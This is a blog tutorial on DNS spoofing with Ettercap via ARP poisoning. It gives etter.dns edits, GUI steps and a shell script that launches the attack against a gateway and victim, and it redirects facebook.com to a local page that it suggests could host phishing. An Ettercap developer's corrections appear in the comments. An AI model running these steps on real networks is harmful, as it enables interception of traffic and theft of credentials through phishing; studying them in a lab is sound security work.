This blog is NOT the official website of Kali Linux. We just share tutorials to learn cybersecurity.

Ettercap -- DNS Spoofing in Kali Linux

Today we are going to learn DNS spoofing on our Kali Linux system with the help of Ettercap, and how to use Ettercap in Kali Linux. Before learning DNS spoofing we need a clear idea of DNS. DNS stands for Domain Name System. A DNS server translates a human-readable domain name (such as google.com or nytimes.com) into the numerical IP address that is used to route communications between nodes.

As we know, every system has a unique IP address, but it is very difficult for a human to remember the IP addresses of many websites, so a domain name is attached to the IP address. To reduce effort and improve performance, a DNS resolver saves each translation for a limited time in what is called a cache.

This means that if it receives another request for the same translation, it can reply without asking any other servers until the cache entry expires.

DNS spoofing is a useful technique in penetration testing. In this attack the attacker makes a domain name resolve to an incorrect IP address, so traffic for that domain is diverted to the attacker's computer or to any other system of the attacker's choosing.

In this tutorial the DNS spoofing is delivered through ARP poisoning: Ettercap first places the attacker between the victim and the gateway, and then answers the victim's DNS queries with forged responses. The victim sees a normal-looking page, so the attack is hard for an end user to notice; on the network it is detectable (duplicate ARP replies, DNS answers arriving from the wrong source, public names resolving to local addresses).

For this tutorial we use Ettercap to spoof DNS. Ettercap is a popular, easy-to-use man-in-the-middle tool that ships with a dns_spoof plugin.

How do we install Ettercap on Kali Linux? We don't need to: Ettercap comes pre-installed with Kali Linux. Its main configuration file is /etc/ettercap/etter.conf, which we can inspect with any text editor (the original used leafpad; if leafpad is not installed on your release, mousepad or nano will do):

leafpad /etc/ettercap/etter.conf
Many tutorials, including the first version of this one, tell you to scroll down to the Linux section and uncomment the two redir_command_on / redir_command_off lines under iptables. Do not do that for DNS spoofing: those lines are not needed for this attack. They enable SSL redirection, after which Ettercap tries to intercept the SSL/TLS handshake of every SSL-enabled protocol with its own self-signed certificate, which produces certificate warnings on the victim and can break the test (this correction comes from the Ettercap developer's comment below the post). Leave etter.conf as shipped and close it.

Then we start our Apache web server with the following command:

service apache2 start
Then we find our local IP with the following command (on newer Kali releases, where ifconfig is not installed by default, use ip addr instead):

ifconfig
The screenshot is following:

ifconfig


When we open our localhost in a browser we see the Apache default homepage. We can put anything on our localhost, such as a phishing page or any other malicious web page. Now we make the facebook.com domain resolve to our localhost: if someone on our local network tries to open facebook.com, they will get our localhost page instead of Facebook. One caveat for a real test: modern browsers enforce HSTS for facebook.com, so they will insist on HTTPS and show a certificate error rather than our plain-HTTP Apache page; pick a lab domain that is not HSTS-preloaded when you try this yourself.

Now we need to configure another Ettercap file, etter.dns, which holds the forged records that the dns_spoof plugin answers with. Open it with the following command:

leafpad /etc/ettercap/etter.dns
The screenshot is following:
etter.dns


Then we scroll down to the sample entries and set our target. See the following screenshot:

etter.dns target


We remove the sample domain highlighted in the screenshot and put in the domain we want to redirect, in our case facebook.com; we also change the next line (the *.domain wildcard) in the same way so that sub-domains such as www.facebook.com are covered. Both of those A records get our local IP, and we delete the third (PTR) sample line. A modern resolver sends an AAAA (IPv6) query alongside every A query, so we also add AAAA records for facebook.com and *.facebook.com pointing at our IPv6 address (shown by ip -6 addr); if we only spoof the A records the victim receives inconsistent answers and some resolvers will not use the forged one (see the Ettercap developer's comment below the post). The configuration is shown in the following screenshot:

etter.dns setting


Then we save the file and close it.
Now we open Ettercap by using following command :

ettercap -G
This will open ettercap's Graphical User Interface(GUI) mode. The screenshot is following;

ettercap GUI


Then we click on Sniff and then Unified sniffing. The screenshot is following:


Here we need to choose our network interface; Ettercap then starts unified sniffing.
Now we choose our targets. Before choosing targets we need to stop unified sniffing: click on the "Start" menu and then "Stop Sniffing".

Then we go to the Targets menu and click on Current Targets. We can see that we don't have any target yet in the following screenshot:

ettercap targets


We need to scan for hosts, so we click on the Hosts menu and then Scan for Hosts.

Then we can see the Host List from the Hosts menu. Here we should see the machines on our network. We add our default gateway as Target 1 and the victim as Target 2. In this demonstration the author's own Kali machine is the victim, so its IP was added as Target 2; in a real test Target 2 is the victim host.

Then we go to the MITM (Man In The Middle) menu, click on ARP Poisoning, tick "Sniff remote connections" and click OK. Now the ARP poisoning is set.

The next step is to go into the Plugins menu, choose Manage the plugins, and activate the dns_spoof plugin (written with an underscore; this is the plugin that answers queries from etter.dns) by double-clicking on it.
The screenshot is following:

dns spoofing


Now we are all set. We go to the Start menu and click on Start Sniffing.

Now we open our browser and try to open facebook.com, but we are redirected to our localhost. Any web page we put on our localhost will be served in its place; if it is a phishing page, this is very dangerous. To learn how to host malicious web pages on localhost, try these tutorials:
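As an added example, not code from the original post and not part of Ettercap itself, the following shell script turns the etter.dns edit and the GUI steps above (ARP poisoning, then the dns_spoof plugin) into one text-mode Ettercap run and adds a check from the victim's side. The interface name, gateway, victim and attacker addresses and the domain are assumptions for a lab network; change them to match your own, and confirm the target syntax against `man ettercap` for your version.

```shell
#!/bin/sh
# Added example for this tutorial (not the original post's code, not Ettercap's).
# Automates the etter.dns entries and the GUI steps using Ettercap's text mode.
# Every address below is an assumption for a lab network: adjust to your own.
set -eu

IFACE="${IFACE:-eth0}"                  # assumption: interface picked in "Unified sniffing"
GATEWAY="${GATEWAY:-192.168.1.1}"       # assumption: default gateway (Target 1)
VICTIM="${VICTIM:-192.168.1.20}"        # assumption: victim host (Target 2)
ATTACKER4="${ATTACKER4:-192.168.1.10}"  # assumption: this box's IPv4 (ifconfig / ip -4 addr)
ATTACKER6="${ATTACKER6:-fe80::1}"       # assumption: this box's IPv6 (ip -6 addr)
DOMAIN="${DOMAIN:-facebook.com}"
ETTER_DNS="${ETTER_DNS:-/etc/ettercap/etter.dns}"

# Emit the etter.dns lines for one domain: an A and an AAAA record for the bare
# name and for all sub-domains. Both record types are needed because a modern
# resolver sends A and AAAA queries in parallel; spoofing only A leaves the
# AAAA answer inconsistent (the point raised in the developer's comment below).
gen_etter_dns() {
    local domain="$1" ip4="$2" ip6="$3"
    printf '%s\tA\t%s\n'      "$domain" "$ip4"
    printf '*.%s\tA\t%s\n'    "$domain" "$ip4"
    printf '%s\tAAAA\t%s\n'   "$domain" "$ip6"
    printf '*.%s\tAAAA\t%s\n' "$domain" "$ip6"
}

# Return 0 if an IPv4 address is RFC 1918 private space. A public domain that
# resolves to a private address is the tell-tale sign of a spoofed resolver.
is_rfc1918() {
    case "$1" in
        10.*|192.168.*) return 0 ;;
        172.1[6-9].*|172.2[0-9].*|172.3[01].*) return 0 ;;
        *) return 1 ;;
    esac
}

# Append the records (only if not already present) and launch Ettercap:
#  -T text UI, -q quiet, -M arp:remote = ARP poisoning with "Sniff remote
#  connections", -P dns_spoof = the plugin from Plugins > Manage the plugins.
# Targets use the common /IP// form; check `man ettercap` on your version.
run_attack() {
    gen_etter_dns "$DOMAIN" "$ATTACKER4" "$ATTACKER6" | while IFS= read -r line; do
        grep -qxF "$line" "$ETTER_DNS" || printf '%s\n' "$line" >> "$ETTER_DNS"
    done
    service apache2 start
    ettercap -T -q -i "$IFACE" -M arp:remote -P dns_spoof "/$GATEWAY//" "/$VICTIM//"
}

# Run on the victim (or a second terminal): did the forged answer land?
check_spoof() {
    answer="$(dig +short A "$DOMAIN" | head -n 1)"
    if is_rfc1918 "$answer"; then
        echo "spoofed: $DOMAIN -> $answer"
    else
        echo "not spoofed: $DOMAIN -> $answer"
        return 1
    fi
}

case "${1:-}" in
    gen)   gen_etter_dns "$DOMAIN" "$ATTACKER4" "$ATTACKER6" ;;
    run)   run_attack ;;
    check) check_spoof ;;
esac
```

Run `sh spoof.sh gen` to preview the records, `sudo sh spoof.sh run` on the Kali box to start the attack, and `sh spoof.sh check` on the victim. In an IPv4-only lab you can still set ATTACKER6 to the attacker's link-local address so that both record types get a consistent answer, which is the fix the developer asks for in the comments.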

Weeman Phishing Over Wan

ShellPhish Easy Phishing
Kali Linux

Comments

6 comments
  • Unknown, March 25, 2020 at 9:26 PM

    My sniffing is not working, what happened brother? Please tell me.

    • Kali Linux, March 26, 2020 at 7:01 AM

      Give me the details of the error, otherwise I can't help you. Are you using Kali in a virtual machine?

    • Anonymous, May 27, 2020 at 9:44 PM

      No error message in the terminal; no error in Ettercap. Got the below message in Ettercap, still not working. My IP was on the left and the target IP on the right.

    • Ettercap, June 9, 2020 at 3:57 AM

      Hi,
      I'm one of the Ettercap developers. I've been notified about this blog by one of the Ettercap users.

      It appears that this blog is providing imprecise information on how to use Ettercap to run a DNS spoof attack.

      The first main issue is that uncommenting the redir_command_on, redir_command_off commands is NOT necessary to run this attack. It even leads to unwanted issues when not handled carefully, since then Ettercap tries to intercept the SSL handshake of every SSL-enabled protocol by default with its self-signed certificate.

      The second issue your blog entry introduces is the fact that it ignores the fact of a world with IPv6 in parallel to IPv4. So while you're only spoofing responses to type A queries, the DNS resolver will in parallel fire AAAA queries, which your example etter.dns ignores. This leads to the result that the DNS resolver gets NXDOMAIN responses and A responses, which seems to confuse a number of DNS resolvers. Either the domain is there but doesn't have records for this record type or it is not there.

      Please correct your blog entry in order to not spread false information.
      Thanks
      Alexander Koeppe

      • Kali Linux, June 10, 2020 at 5:25 AM

        Hello Alexander, we feel glad that you read our article, and we are very sorry for our content. To clear things up, we can say that we don't share false articles and always try to give genuine knowledge to our readers. But sometimes mistakes happen. We will correct this article as per your recommendation. Thank you very much for giving us time and making things beautiful.